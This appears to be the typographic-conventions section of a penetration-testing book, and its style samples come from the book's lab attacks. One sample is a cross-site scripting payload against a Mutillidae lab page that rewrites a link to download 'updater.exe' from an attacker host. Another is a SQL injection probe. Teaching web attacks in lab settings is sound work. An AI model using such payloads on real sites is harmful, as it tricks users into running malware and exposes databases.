In this book, you will find a number of text styles that distinguish between different kinds of information. Here are some examples of these styles and an explanation of their meaning.
Code words in text, database table names, folder names, filenames, file extensions, pathnames, dummy URLs, user input, and Twitter handles are shown as follows: "As with general exploits, we can see the payload's options in following screenshot using show options and see the commands with -h to guide ourselves through the entire operation."
A block of code is set as follows:
http://172.16.30.129/mutillidae/index.php?page=user-info.php
&username=
Infiltrating Sessions via Cross-Site Scripting
[ 20 ]
<script>window.onload = function() {var
AllLinks=document.getElementsByTagName("a"); AllLinks[0].href =
"http://172.16.30.128/updater.exe"; }</script>
Any command-line input or output is written as follows:
SELECT username FROM accounts WHERE username='''
New terms and important words are shown in bold. Words that you see on the screen, for example, in menus or dialog boxes, appear in the text like this: "When we click on the Login button, our helpful database spills the beans and we realize exactly what the query we are trying to attack is, as shown in following screenshot."